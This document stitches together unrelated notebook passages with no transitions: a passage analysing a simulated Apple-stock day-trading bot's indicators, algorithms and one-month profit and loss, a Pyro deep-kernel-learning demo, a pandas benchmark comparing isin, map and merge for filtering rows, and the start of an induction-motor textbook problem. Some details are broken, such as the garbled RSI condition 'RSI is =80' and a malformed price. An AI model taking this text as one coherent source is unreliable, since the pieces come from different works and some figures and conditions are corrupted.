purchase price, and the stop-loss price for selling would be set lower than the purchase price. For shorting a stock, the limit price for selling would be set lower than the purchase price, and the stop-loss price for selling would be set higher than the purchase price. 
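To make this concrete, here is a minimal sketch of how the two exit prices relate to the entry price for a long versus a short position. The function name and the $0.25 profit target and stop distance are illustrative values, not taken from the bot's actual code:

```python
# Illustrative sketch (not the bot's code): how limit-sell and stop-loss prices
# relate to the entry price for long vs. short positions.
def exit_prices(entry_price, position, profit_target=0.25, stop_distance=0.25):
    """Return (limit_sell_price, stop_loss_price) for a 'long' or 'short' position."""
    if position == "long":
        # Long: profit if the price rises, so sell above the entry and stop out below it.
        return entry_price + profit_target, entry_price - stop_distance
    if position == "short":
        # Short: profit if the price falls, so buy back below the entry and stop out above it.
        return entry_price - profit_target, entry_price + stop_distance
    raise ValueError("position must be 'long' or 'short'")

print(exit_prices(273.75, "long"))   # (274.0, 273.5)
print(exit_prices(273.75, "short"))  # (273.5, 274.0)
```

A profitable trade is closed by the limit order, an unprofitable one by the stop-loss order, exactly as described above.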
3.3 Explanation of Derived Numbers and Their PurposeThe following numbers are calculated from stock's data: SMA, EMA, RSISMA stands for simple moving average. When calculating SMA, the time unit and time interval need to be specified. For example, calculating SMA for a period of 9 and a time unit of minutes would involve taking the closing price of a stock for the last 9 minutes and taking the average. SMA9 could denote this average for short. EMA stands for exponential moving average. The idea to calculate EMA is similar to that of SMA, but EMA gives more weight to recent data, unlike SMA, which gives equal weight to all the data. The bot utilizes EMA and SMA over 9, 15, 65, and 200-minute intervals are designated by SMA9, SMA15, SMA65, SMA200 or EMA9, EMA15, EMA65, EMA200RSI stands for relative strength index. Mathematically, RSI looks at average gain vs. average loss over a specific period; 14 minutes in this case. RSI ranges from 0 to 100. RSI of 30 or below indicates that the stock is oversold while RSI of 70 or above shows an overbought condition. RSI should not be used on its own to sell or buy stocks as stocks can stay overbought or oversold for a long time.The use of these derived numbers will be explained below when discussing the trading algorithms 4.0 Trading Algorithms TheoryThe two trading algorithms the bot uses are Base Trade Algorithm and Far From Moving Average Trade Algorithm. The specific implementation of the trades can be studied from the code included in the repository. The basic theory of the algorithms are described below 4.1 Base Trade AlgorithmThe base trade algorithm first ensures that a stock is in a "Base"; the stock's price should appear virtually flat for a minimum of 30 minutes. More specifically, the price should fluctuate no more than 0.5% of the stock's price. As soon as the stock's price moves out of the 0.5% range in either direction, place a market order for going long or short. The stop loss price is equal to the lowest/highest price during the base. Depending on the stock's price, the limit sell price is specified to reach a profit target of \\$0.25-\\$1 per share. 4.2 Far From Moving Average Trade AlgorithmFar from moving average trade algorithm first ensures that the stock has diverted more than $1.50 from the closest EMA and RSI is =80. When the stock's price starts to break its upward or downward spiral, place a market order for going short or long. The stop-loss order is placed on the lowest/highest point of the spiral, and the limit sell order should be specified to reach a target of no more than \\$1 profit per share. 5.0 Methodology 5.1 Obtaining Data and Simulating Real-Time TradingAll the stock's price data is obtained as a table (really a DataFrame) using the [Yahoo Finance python package](https://pypi.org/project/yahoo-finance). Yahoo Finance python package gives historical data of a stock's price over a different period; I chose to use 1 minute period. The following table illustrates the format of the data:import numpy as np import pandas as pd import yfinance as yf test_data = yf.download (tickers = "AAPL", start= "2020-09-02", end = "2020-09-03", interval= "1m") test_data.head()[*********************100%***********************] 1 of 1 completedNote that for the purpose of the trading bot, data for the stock is shown at 1 minute intervalDatetime contains both date and time. The time part is formatted as *Current Time: 00-04:00*. 00-04:00 is 4 PM, which is when the North American stock market usually closes. 
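As an aside, the derived numbers described in Section 3.3 can be computed from a `Close` column like the one above with a few lines of pandas. This is a generic sketch of the standard formulas, not necessarily the bot's exact implementation (the simple rolling-mean RSI shown here differs slightly from Wilder's smoothed version):

```python
# Sketch: rolling/exponential averages and a basic RSI over the 1-minute closes in test_data.
close = test_data["Close"]

sma9 = close.rolling(window=9).mean()          # SMA9: plain average of the last 9 closes
ema9 = close.ewm(span=9, adjust=False).mean()  # EMA9: recent closes weighted more heavily

# Basic 14-period RSI: average gain vs. average loss, scaled to 0-100.
delta = close.diff()
gain = delta.clip(lower=0).rolling(window=14).mean()
loss = (-delta.clip(upper=0)).rolling(window=14).mean()
rsi14 = 100 - 100 / (1 + gain / loss)

print(pd.concat([close, sma9, ema9, rsi14], axis=1,
                keys=["Close", "SMA9", "EMA9", "RSI14"]).tail())
```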
Each row tells us what happened during a minute. For example, the first row is saying that between 9:30:00 AM to 9:30:59 AM, the stock's opening price was \\$137.59 (Open' column). During this minute, the stock's price reached a high of \\$137.98 ('High) and reached a low of \\$136 ('Low' Column). The stock's price at the end of the 30th minute of the day was \\$136:06 ('Close). During this minute, 11490492 shares changed hands ('Volume' column). Adj Close or Adjusted Close Price can be interpreted similarly to Closing price; it also factors in dividends, stock splits, new stock offerings. Usually 'Adj Close' and 'Close' price is the sameYahoo finance package does not give real-time data. It only provides historical price data. So, price data for April 16, 2020, can't be obtained until the end of April 16, 2020. In real-life, a bot could get live data minute by minute by calling the broker's API. To simulate this, this bot instead only receives one minute of data for each iteration of a central loop that encompasses the entire software. So, for a given day, in the first iteration of the loop, the bot would only have access to stock's price data to the end of 9:30 AM (market opens at 9:30 AM in North America). In the second iteration, the bot would have access to data until the end of 9:31 AM, and so on.Later on, DataFrame containing data similar to the data shown above, along with derived numbers such as SMA, EMA, and RSI, are used to aid in making trading decisions. 5.2 Constraints, Assumptions, and Overall Trading ProcessHere are initial conditions, constraints, and assumptions under which the bot operates- The starting capital is USD 10,000- The bot only trades Apple Stock (Ticker: AAPL)- The bot can only make one trade at a time- The maximum loss for a day is $100. - If both Base Trade Algorithm and Far From Moving Average trade signals are active at any minute, then base trade is given priority. This choice was made because the base trade algorithm theory is much more precise than the far from moving average trade algorithm- No trades are placed after 3:30 PM, and all the trades are closed by 3:50 PM. These limits are there to allow a trade setup to play out (the last possible trade in a day have 20 minutes to play out) and ensure that all positions are closed by the end of the dayThe overall program is executed as followed by the bot:1. Append one row of data to the DataFrame containing the stock's price data2. Calculate derived numbers (SMA, EMA, RSI) including the latest data3. Check if the base trade algorithm and or far from moving average generated a trading signal. 4. Check if there is an active trade. If there is an active trade, then check if the positions should be closed based on stop-loss price and limit sell price5. Act on the trading signal from Step 3 if the following conditions are satisfied: - No active trade - Current time is 3:30 PM or earlier - Maximum loss for the day won't be reached if the trade does not play out in our favor As noted before, all buy orders are market order, and for every purchase order, two sell orders: limit sell and stop-loss sell are also issued.6. Repeat Step 1-5As stated before, when acting on a trading signal, the bot gives priority to base trade signals over far from moving average trade signals. During buying, the bot records buying time, buying price, and the number of shares. In each trade, all available capital is used to purchase shares. 
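As a small, self-contained illustration of the gating checks in Step 5 above, the decision of whether a new trade may be opened could look like the following. The function and argument names are hypothetical, not the ones used in the repository:

```python
import datetime as dt

# Hypothetical sketch of the Step 5 checks: no open position, at or before 3:30 PM,
# and the daily loss cap would not be breached even if the new trade hits its stop-loss.
def can_open_trade(current_time, has_active_trade, realized_loss_today,
                   potential_loss_of_new_trade, max_daily_loss=100):
    before_cutoff = current_time.time() <= dt.time(15, 30)
    within_loss_cap = realized_loss_today + potential_loss_of_new_trade <= max_daily_loss
    return (not has_active_trade) and before_cutoff and within_loss_cap

print(can_open_trade(dt.datetime(2020, 3, 10, 13, 31), False, 40, 25))  # True
print(can_open_trade(dt.datetime(2020, 3, 10, 15, 45), False, 0, 25))   # False: past 3:30 PM
print(can_open_trade(dt.datetime(2020, 3, 10, 13, 31), True, 0, 25))    # False: trade already open
```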
The broker fee is assumed to be $1 during selling or buying as per the [Interactive Brokers website](https://www.interactivebrokers.ca/en/index.php?f=45251&p=stocks1). The selling time of a position and the profit/loss are also recorded in the appropriate row of the trade summary table. A stock's price is generally continuous. In real life, it seems that the stock's price is updated every second. However, the bot only has access to minute-by-minute data. Thus, at Step 4, if there is an active trade and the bot detects, from the latest data obtained in Step 1, that the stock's price crossed either of the price thresholds established by the limit and stop-loss sell orders, then it is assumed that the bot sold the position at the limit sell or stop-loss price. As an example, the bot receives data up to the end of 1:30 PM at 1:31 PM. With the help of the algorithms, the bot purchases the stock at 1:31 PM at \\$273.75 per share. The limit sell price is set at \\$274 per share. Within thirty seconds, the stock's price reached the price target of \\$274 per share. At 1:32 PM, the bot receives data up to the end of 1:31 PM. The bot sees that the stock's price closed at \\$275 at the end of 1:31 PM. Thus, we can assume that the broker's bot sold the shares at \\$274 per share due to the continuity assumption, and we achieved our profit target. This is a simplification of the selling process, as alluded to before. 6.0 Result Analysis from the Trading Bot This section analyzes the data outputted by the trading bot as it simulated trading Apple's stock from March 10, 2020 to April 3, 2020. The goal of the analysis is first to see if the trading bot is profitable, and second to see whether we can identify some scenarios that are more profitable than others. import datetime as dt import seaborn as sb import matplotlib.pyplot as plt 6.1 Analysis of Profit and Loss Summary by Days ending_balance = pd.read_csv('BalanceChange30Days.csv', index_col = 0) ending_balance This DataFrame shows the ending balance at the end of each day. The starting balance was USD 10,000 as stated before. At the end of 19 business days, the trading bot lost about \$76.74. The result is a bit disappointing to see, especially considering that just two days before the end of the test run, it had made a total profit of about \$56.76. Let's dive deeper into the losing and winning days.
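Incidentally, the same day-by-day profit/loss can be derived in one step with `Series.diff()`; a minimal sketch, using the `EndingBalance` column shown above and the stated USD 10,000 starting capital:

```python
# Daily profit/loss as the change in ending balance from one day to the next.
# The first day's figure is measured against the 10,000 USD starting capital.
daily_pl = ending_balance['EndingBalance'].diff()
daily_pl.iloc[0] = ending_balance['EndingBalance'].iloc[0] - 10000
print(daily_pl.round(2))
```

This should match the `Profit_Loss` column constructed in the cleanup below and can serve as a quick cross-check.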
Some minor cleanup on the data is done in the process#reset index so starting index is 0 ending_balance.index = list(range(ending_balance.shape[0])) #Add in starting balance column for each day ending_balance['StartingBalance'] = pd.Series() ending_balance['StartingBalance'][1:] = ending_balance['EndingBalance'][:-1] ending_balance.loc[0,'StartingBalance']= 10000 #First starting balance is 10,000 #Calculate profit for each day ending_balance['Profit_Loss'] = ending_balance['EndingBalance'] - ending_balance['StartingBalance'] #label the ending and losing day to see distributoin of losses/profit for losing and winning days ending_balance['Profit_Loss_Label'] = pd.Series() ending_balance.loc [ending_balance['Profit_Loss']>=0, 'Profit_Loss_Label'] = 'Profit' ending_balance.loc [ending_balance['Profit_Loss']<0, 'Profit_Loss_Label'] = 'Loss' #Round off dollar amount to two decimal point for column in ['EndingBalance', 'StartingBalance', 'Profit_Loss']: ending_balance[column] = ending_balance[column].round(2) ending_balance.head() #Days when the bot broke even is counted as a winning day num_winning_days = (ending_balance['Profit_Loss']>=0).sum() num_losing_days = (ending_balance['Profit_Loss']<0).sum() print('Number of winning days are: {}'.format(num_winning_days)) print('Number of losing days are: {}'.format(num_losing_days)) #Create a temporary ending_balance DataFrame copy so we can use absolute value for losses/profit #This will make comparison easier temp_ending_balance = ending_balance.copy() temp_ending_balance['Profit_Loss'] = temp_ending_balance['Profit_Loss'].abs() sb.boxplot(x = 'Profit_Loss_Label', y = 'Profit_Loss', data = temp_ending_balance) plt.xlabel('Trade Classification') plt.ylabel('Profit/Loss') plt.title('Distribution of Profits and Losses by Days') #Statistics for winning days temp_ending_balance[temp_ending_balance['Profit_Loss_Label']=='Profit'].describe()['Profit_Loss'] #Statistics for losing days temp_ending_balance[temp_ending_balance['Profit_Loss_Label']=='Loss'].describe()['Profit_Loss']On average, the bot seems to be good at breaking even or making a profit since it broke even or made money in 11 days and lost money in 8 days.The box and whisker illustrate that during winning days, the profit is in a much narrower range compared to losses in losing days. The percentiles printed here confirms this: 50% of the time, the bot makes \\$10.25 or less during the winning days, and 50% of the time, the bot losses \\$28.375 or less during losing daysending_balance[ending_balance['Profit_Loss']<0]Looking at the losing days further, we indeed see that only four days made up the overwhelming amount of lossesSo there is a chance that in the future, some common factor could be found amongst those days to help the bot perform betterTraders typically seem to love volatility as they can play either side of the market and profit. 
Thus, let's next check if the price range of the stock on a particular day and standard deviation affected profit or lossesstock_data = pd.read_csv('StockData30Days.csv') #Calculate stock's max range and standard deviation for each day and append to ending balance dataframe ending_balance['MaxPriceRange'] = pd.Series() ending_balance['StandardDeviation'] = pd.Series() for date in stock_data['DateOnly'].unique(): #Obtain max range and standar deviation by slicing stock dataframe by dates one_date_data = stock_data.loc[stock_data['DateOnly'] == date,:] max_range = one_date_data['Close'].max() - one_date_data['Close'].min() std_dev = one_date_data['Close'].std() #Append max range and standard deviation to Ending Balance Dataframe ending_balance.loc[ending_balance['Date'] == date,'MaxPriceRange'] = max_range ending_balance.loc[ending_balance['Date'] == date,'StandardDeviation'] = std_dev ending_balance.head() plt.scatter(data = ending_balance, x = 'MaxPriceRange', y = 'Profit_Loss') plt.xlabel('Maximum Price Range in a Day') plt.ylabel('Profit/Loss') plt.title('Maximum Price Range vs. Profit/Loss in a Day') plt.scatter(data = ending_balance, x = 'StandardDeviation', y = 'Profit_Loss') plt.xlabel('Standard Deviation in Price in a Day') plt.ylabel('Profit/Loss') plt.title('Standard Deviation in Price vs. Profit/Loss in a Day')From the scatter plot, it does not seem that there is any relationship between profit to either maximum range or standard deviationending_balance[['Profit_Loss', 'MaxPriceRange', 'StandardDeviation']].corr()The correlation matrix further proves the lack of any strong relationship between Profit_Loss to either of MaxPriceRange and StandardDeviation; Profit_Loss and MaxPriceRange have a correlation of 0.092819, Profit_Loss and StandardDeviation have a correlation of 0.140759. This is not a surprise considering the trade algorithms in their core don't uitlize volatility at all.It makes sense that MaxPriceRange and StandardDeviation have a strong correlation as a higher max range would typically correspond to a higher standard deviation. 6.2 Analysis of All Executed Tradesall_trade_summary = pd.read_csv('AllTradeSummary30Days.csv') all_trade_summary.head() #Minor Cleanup #Unnamed:0 is the buy time index new_column_titles = list(all_trade_summary.columns) new_column_titles[0] = 'BuyTimeMinute' all_trade_summary.columns = new_column_titles all_trade_summary.head()Explanation of Columns- **BuyTimeMinute**: BuyTimeMinute indicates the Buy Time by calculating the difference between the buy time and starting time of the day (9:30 AM) in minutes. For example, 9:55 AM would have a BuyTimeMinute of 25. Encoding trade time this way helped to keep track of trade and could help in using machine learning algorithms in future versions of this bot.- **CurrentDay**: The day when the trade was executed- **TradeType**: Indicates the type of trade. The choices are either the base trade or far from moving average trade- **TradeStatus**: Indicates whether we went long on a stock or shorted the stock for a particular trade- **BuyPrice**: The price the shares were bought for shorting or going long- **LimitSellPrice**: The price at which the trading position was closed at if the trade was profitable- **StopLossPrice**: The price at which the trading position was closed at if the trade was unprofitable- **NumShares**: The number of shares for the specific trading position- **IsTradeComplete**: This column was used to keep track of active trade. 
It only contains "Yes" as all the trades were completed as per the constraints set on the bot- **SoldTime**: The time when the trading position was closed- **Profit**: Profit for the current trade We will first look at winning and losing trades on their ownWe will then look at winning and losing trade by TradeType, then by TradeStatusWe will finally look at whether the buy time for a trade affects the profitability of a trade or notnum_winning_trades = (all_trade_summary['Profit']>0).sum() num_losing_trades = (all_trade_summary['Profit']<0).sum() print('Total number of trades made are: {}'.format(all_trade_summary.shape[0])) print('Number of winning trades are: {}'.format(num_winning_trades)) print('Number of losing trades are: {}'.format(num_losing_trades)) #Creating labels for box and whisker plot all_trade_summary['Profit_Loss_Label'] = pd.Series() all_trade_summary.loc [all_trade_summary['Profit']>0, 'Profit_Loss_Label'] = 'Profit' all_trade_summary.loc [all_trade_summary['Profit']<0, 'Profit_Loss_Label'] = 'Loss' all_trade_summary.head() sb.boxplot(x = 'Profit_Loss_Label', y = 'Profit', data = all_trade_summary) plt.xlabel('Trade Classification') plt.ylabel('Profit/Loss') plt.title('Distribution of Profits and Losses by Trade') all_trade_summary.loc [all_trade_summary['Profit']>0, 'Profit'].describe() all_trade_summary.loc [all_trade_summary['Profit']<0, 'Profit'].describe() all_trade_summary['TradeType'].value_counts()It is not surprising that both winning and losing trade cluster around a similar area. As seen above, most of the trades were base trade, and in the implementation of the base trade algorithm, both stop loss and limit sell were set at $0.25 per share. The outliers for both losses and profit are likely to be from far from moving average tradeall_trade_summary[all_trade_summary['Profit'].abs()>15]And as shown here, the outliers in losses and gains (mostly losses) were all from far from moving average trade. As a natural next step, let's take a look at profit breakdown by TradeTypeall_trade_summary.groupby('TradeType').agg(np.sum)['Profit']Above, we have a summary of net profit by trade type. The base trade algorithm returned a profit of $12.50 while far from moving average trade algorithm lost a net \\$89.24As suspected, far from moving average algorithm caused more harm than good. Let's see next if shorting was more profitable or going long was more profitableall_trade_summary.groupby('TradeStatus').agg(np.sum)['Profit']In terms of going long on a stock or shorting a stock, it definitely seems more profitable to short a stockall_trade_summary.groupby(['TradeType','TradeStatus']).agg(np.sum)['Profit']The most profitable strategy seems to be only executing on short trade signals for base trade algorithm. If the bot only acted on this signal, then it would be reasonably profitable over 19 business days. It would return about 0.715% over a month, which annualizes to about 8.92% over a year. 8.92% annual return would beat most hedge funds. However, this data is only for over a month, so the comparison is not valid.Let's see if a particular buying time of the trade has any significant impact on profit or loss on tradessb.boxplot(x = 'Profit_Loss_Label', y = 'BuyTimeMinute', data = all_trade_summary) plt.xlabel('Trade Classification') plt.ylabel('Buy Time In Minutes Elapsed') plt.title('Distribution of Profits and Losses by Trade and Buy Time')Visually, we can see that buy time distribution of both winning and losing trades are roughly the same. 
So it is unlikely that the time of the day when a stock is bought affects the profit/loss on a a particular trade 6.3 Base Trade Summary Analysisbase_trade_summary = pd.read_csv('BaseTradeSummary30Days.csv', index_col = 0) far_moving_average_trade_summary = pd.read_csv('FarFromMovingAverageTradeSummary30Days.csv', index_col = 0) base_trade_summary.head()This DataFrame primary contains data of every 30-minute interval along with the stock's price range, the max/min stock's price during a 30-minute interval and their corresponding time, and so onStartTimeIndex and EndTimeIndex are the numbers of minutes passed since the market opened (9:30 AM). The difference between StarTimeIndex and EndTimeIndex is always 30 minutes because we are using each 30-minute block of time to check if the stock is in a base.The particular column of interest is TradeSignal and ExecutedOnSignalbase_trade_summary['TradeSignal'].unique()The TradeSignal column contains four values, as shown above- Nothing implies that the stock was not in a base during the 30-minute interval- Base means that the stock was in a base but did not break the base in the 31st minute- Long/Short implies that the stock was in a base and did break the base in the upward or downward directionbase_trade_summary['ExecutedOnSignal'].unique()The ExecutedOnSignal contains three values as shown above- Nothing implies that there was no base trading signal. Thus there was no question of the bot acting on a signal- Yes means that there was a base trade signal, and the bot acted on the signal- No implies that there was a base trade signal and the bot did not act on itSince it was established that base trade and shorting a stock is likely the most profitable trade, let's see how many of those signal, the bot did not act onbase_trade_summary['ExecutedOnSignal'].value_counts() #Bit of processing to show summarized data by ExecutedOnSignal and TradeSignal grouped_executed_tradeSignal = base_trade_summary.groupby(['ExecutedOnSignal', 'TradeSignal']).agg({'Date':'count'}) grouped_executed_tradeSignal.columns = ['count'] grouped_executed_tradeSignal.reset_index(inplace = True) grouped_executed_tradeSignalAbout equal number of trade signal was ignored by the bot for both long and short trade signalbase_trade_summary[base_trade_summary['ExecutedOnSignal'] == 'No']['EndTimeIndex'].max()Recall that the bot was constrained to not trade after 3:30 PM. 3:30 PM would correspond to a TimeIndex of 390 (implying 390 minutes passed since 9:30 AM). Since 383<390, no base trade signal was rejected due to time constraints on the bot. There were only four far from moving average trade executed over 19 days compared to 182 base trade. So active base trade and or maximum profit loss constraint likely caused the bot to ignore the trade signal. 6.4 Far From Moving Average Trade Summary Analysisfar_moving_average_trade_summary.head()This DataFrame contains a summary of result outputted by the bot for every minute the market was open from March 10, 2020, to April 3, 2020Only analysis for 9:30 AM is excluded as the far from moving average trade algorithm needs at least one previous minute of data to see if the stock price trend is breaking. I did not want to use the previous day's data at 4 PM as the last price as lots of trading happens after hours, which's data is not available from Yahoo Finance. Thus, using 9:30 AM data as the starting point of the trading algorithm made more sense.The indices here range from 1 to 389 for each day and then repeated for a new day. 
The row indices are Time Index or how many minutes have passed since 9:30 AM. The rest of the columns are self-explanatory based on the discussion so far, and thus not explained further.far_moving_average_trade_summary['ExecutedOnSignal'].unique()So bot executed on every trade signal generated by the far from moving average trade signalfar_moving_average_trade_summary.loc[far_moving_average_trade_summary['ExecutedOnSignal'] == 'Yes',:]Only four far from moving average trade was made in a month. The RSI threshold of 20 and 80 is not easily crossed without an exceptional market environment like in the first and second quarter of 2020; there was a panic selling followed by massive buying, resulting in a V-shaped recovery. Thus, the few numbers of far from moving average trade make sense.all_trade_summary[all_trade_summary['TradeType'] == 'FarFromMovingAverageTrade']Deep Kernel LearningWe now briefly discuss deep kernel learning. Quoting the [deep kernel learning paper](https://arxiv.org/abs/1511.02222): scalable deep kernels combine the structural properties of deep learning architectures with the non-parametric flexibility of kernel methods. We will transform our input via a neural network and feed the transformed input to our GP. To illustrate, we will create a simple step function dataset (heavily inspired from this [excellent writeup on tinyGP](https://tinygp.readthedocs.io/en/stable/tutorials/transforms.html)). We will be comparing our deep kernel with the RBF kernel.import torch import torch.nn as nn import torch.nn.functional as F import matplotlib.pyplot as plt import seaborn as sns from mpl_toolkits.axes_grid1 import make_axes_locatable import pyro.contrib.gp as gp import pyro torch.manual_seed(0) noise = 0.1 x = torch.sort(torch.distributions.Uniform(low=-1., high=1.).sample([100, 1]), 0)[0] x_squeeze = x.squeeze() y = 2 * (x_squeeze > 0) - 1 + torch.distributions.Normal(loc=0.0, scale=noise).sample([len(x)]) t =torch.linspace(-1.5, 1.5, 500) plt.plot(t, 2 * (t > 0) - 1, "k", lw=1, label="truth") plt.plot(x_squeeze, y, ".k", label="data") plt.xlim(-1.5, 1.5) plt.ylim(-1.3, 1.3) plt.xlabel("x") plt.ylabel("y") _ = plt.legend() class Net(nn.Module): def __init__(self): super().__init__() self.fc1 = nn.Linear(1, 5) self.fc2 = nn.Linear(5, 5) self.fc3 = nn.Linear(5, 2) def forward(self, x): x = F.relu(self.fc1(x)) x = F.relu(self.fc2(x)) x = self.fc3(x) return x pyro.clear_param_store() n = Net() # Using a separate lengthscale for each dimension rbf = gp.kernels.RBF(input_dim=2, lengthscale=torch.ones(2)) deep_kernel = gp.kernels.Warping(rbf, iwarping_fn=n) likelihood = gp.likelihoods.Gaussian() model_deep = gp.models.VariationalGP( X=x, y=y, kernel=deep_kernel, likelihood=likelihood, whiten=True, jitter=2e-3, ) model_rbf = gp.models.VariationalGP( X=x, y=y, kernel=gp.kernels.RBF(input_dim=1), likelihood=likelihood, whiten=True, jitter=2e-3, )As we can see, it is fairly straightforward to create a `deep` kernel by combining a regular kernel with a neural network. We can also confirm our `deep` kernel by printing it below. It should also be noted that unlike our earlier code, we explicitly specified lengthscale in our above example to be a vector of two values. 
This will allow our model to learn a different lengthscale for each dimension. deep_kernel losses_deep = gp.util.train(model_deep, num_steps=1000) losses_rbf = gp.util.train(model_rbf, num_steps=1000) plt.plot(losses_deep, label='Deep') plt.plot(losses_rbf, label='RBF') sns.despine() plt.legend() plt.xlabel("Iterations") plt.ylabel("Loss") with torch.no_grad(): fig, ax = plt.subplots(ncols=2, sharey=True, figsize=(9, 3)) for i, (model_name, model) in enumerate(zip(["Deep Kernel", "RBF"], [model_deep, model_rbf])): mean, var = model(x) ax[i].plot(x.squeeze(), mean, lw=4, color=f'C{i+1}', label=model_name) ax[i].fill_between(x_squeeze, mean-torch.sqrt(var), mean+torch.sqrt(var), alpha=0.3, color=f'C{i+1}') ax[i].scatter(x.squeeze(), y, color='k', alpha=0.7, s=25) ax[i].set_title(model_name) sns.despine() with torch.no_grad(): z = n(x) plt.plot(x.squeeze(), z, label='Transformed Input') plt.scatter(x.squeeze(), y, color='k', alpha=0.7, s=25, label='Data') plt.legend() Our deep kernel transforms the data into step-function-like data, making it better suited than the RBF kernel, which has a hard time owing to the sudden jump around x=0.0. rbf.lengthscale 3. Extracting records that match multiple values Suppose we want to extract the records with specific `user_id` values from in-game item purchase data. from itertools import product from matplotlib import pyplot as plt import numpy as np import pandas as pd from utilities.process_time import PandasProcessTimeMeasure plt.rcParams['font.size'] = 12 plt.rcParams['figure.figsize'] = (10, 6) item_data = pd.read_csv('./data/game_user_item.csv') item_data.head(5) In a case like this,

```python
is_user1 = (item_data.user_id == 1)
is_user2 = (item_data.user_id == 2)
is_user3 = (item_data.user_id == 3)
item_data.loc[is_user1 | is_user2 | is_user3, :]
```

looks like the most efficient approach. However, in data analysis we almost always want to extract the users who satisfy some condition, so the targets are rarely a small fixed set, and the number of target users varies; this makes the code above hard to adopt. If we instead use the `isin` method implemented on DataFrame,

```python
target_user_id = [1, 2, 3]
item_data.loc[item_data.user_id.isin(target_user_id), :]
```

we can easily pass target_user_id in as an external variable, which gives us code that is much easier to maintain. However, the `isin` method is for some reason slow, and the problem is that it becomes unusable on 10 million rows of data. Here we investigate this case. Method 1: Using the isin method. First, as a benchmark, the approach using the `isin` method. Its biggest appeal is how concise the code is. TEST_TARGET_USER_ID = [2855, 6635] def method1(data, user_id): _data = data.copy() is_target_user = _data.user_id.isin(user_id) result = _data.loc[is_target_user, :] return result method1(item_data.iloc[:100, :], TEST_TARGET_USER_ID).head() Method 2: Flagging the target rows with map and extracting them. Next is an approach that uses the `map` method to flag the rows to extract. It feels similar to the `isin` approach, but we benchmark it anyway. def method2(data, user_id): _data = data.copy() is_target_user = _data.user_id.map(lambda i: i in user_id) result = _data.loc[is_target_user, :] return result method2(item_data.iloc[:100, :], TEST_TARGET_USER_ID).head() Method 3: Flagging the target rows with merge and extracting them def method3(data, user_id): _data = data.copy() flag_table = pd.DataFrame( data={ 'user_id': user_id, 'is_target': [1] * len(user_id) } ) tmp = _data.merge( right=flag_table, on=['user_id'], how='left' ) result = tmp.loc[tmp.is_target == 1, :].copy() return result method3(item_data.iloc[:100,:], TEST_TARGET_USER_ID).head() Results: Comparing methods 1-3 on data of up to 20,000 rows, with the number of target users fixed at 10 def generate_target_user_id_list(n): user_id_list = item_data.user_id.unique() return np.random.choice(user_id_list, size=n).tolist() TARGET_USER_ID = generate_target_user_id_list(10) process_time_measure = PandasProcessTimeMeasure( data=item_data, sample_sizes=[100, 500, 1000, 5000, 10000, 20000] ) process_time_measure.set_method(name='method01', method=lambda x: method1(x, TARGET_USER_ID))
process_time_measure.set_method(name='method02', method=lambda x: method2(x, TARGET_USER_ID)) process_time_measure.set_method(name='method03', method=lambda x: method3(x, TARGET_USER_ID)) process_time_measure.measure_process_time_for_each_sample_sizes() process_time_measure.plot_process_time() process_time_measure.process_time Comparing methods 1-3 on data of up to 10 million rows TARGET_USER_ID = generate_target_user_id_list(10) process_time_measure = PandasProcessTimeMeasure( data=item_data, sample_sizes=[10000, 50000, 100000, 1000000, 10000000] ) process_time_measure.set_method(name='method01', method=lambda x: method1(x, TARGET_USER_ID)) process_time_measure.set_method(name='method02', method=lambda x: method2(x, TARGET_USER_ID)) process_time_measure.set_method(name='method03', method=lambda x: method3(x, TARGET_USER_ID)) process_time_measure.measure_process_time_for_each_sample_sizes() process_time_measure.plot_process_time() process_time_measure.process_time Evaluating methods 1-3 while varying the number of target users TARGET_USER_ID = generate_target_user_id_list(100) process_time_measure = PandasProcessTimeMeasure( data=item_data, sample_sizes=[10000, 50000, 100000, 1000000, 10000000] ) process_time_measure.set_method(name='method01', method=lambda x: method1(x, TARGET_USER_ID)) process_time_measure.set_method(name='method02', method=lambda x: method2(x, TARGET_USER_ID)) process_time_measure.set_method(name='method03', method=lambda x: method3(x, TARGET_USER_ID)) process_time_measure.measure_process_time_for_each_sample_sizes() process_time_measure.plot_process_time() process_time_100 = process_time_measure.process_time.copy() user_num_index = pd.Series([100] * process_time_100.shape[0]) user_num_index.name = 'user_num' process_time_100.set_index(user_num_index, append=True, inplace=True) process_time_100 Since `method2` is slow, we exclude it and compare only `method1` and `method3`. TARGET_USER_ID = generate_target_user_id_list(500) process_time_measure = PandasProcessTimeMeasure( data=item_data, sample_sizes=[10000, 50000, 100000, 1000000, 10000000] ) process_time_measure.set_method(name='method01', method=lambda x: method1(x, TARGET_USER_ID)) process_time_measure.set_method(name='method03', method=lambda x: method3(x, TARGET_USER_ID)) process_time_measure.measure_process_time_for_each_sample_sizes() process_time_measure.plot_process_time() TARGET_USER_ID = generate_target_user_id_list(1000) process_time_measure = PandasProcessTimeMeasure( data=item_data, sample_sizes=[10000, 50000, 100000, 1000000, 10000000] ) process_time_measure.set_method(name='method01', method=lambda x: method1(x, TARGET_USER_ID)) process_time_measure.set_method(name='method03', method=lambda x: method3(x, TARGET_USER_ID)) process_time_measure.measure_process_time_for_each_sample_sizes() process_time_measure.plot_process_time() TARGET_USER_ID = generate_target_user_id_list(5000) process_time_measure = PandasProcessTimeMeasure( data=item_data, sample_sizes=[10000, 50000, 100000, 1000000, 10000000] ) process_time_measure.set_method(name='method01', method=lambda x: method1(x, TARGET_USER_ID)) process_time_measure.set_method(name='method03', method=lambda x: method3(x, TARGET_USER_ID)) process_time_measure.measure_process_time_for_each_sample_sizes() process_time_measure.plot_process_time() Exercises Electric Machinery Fundamentals Chapter 6 Problem 6-26 %pylab inline Populating the interactive namespace from numpy and matplotlib Description A 460-V 50-hp six-pole $\Delta$-connected 60-Hz three-phase induction motor has a full-load slip of 4 percent, an efficiency of 91 percent, and a power factor of 0.87 lagging.
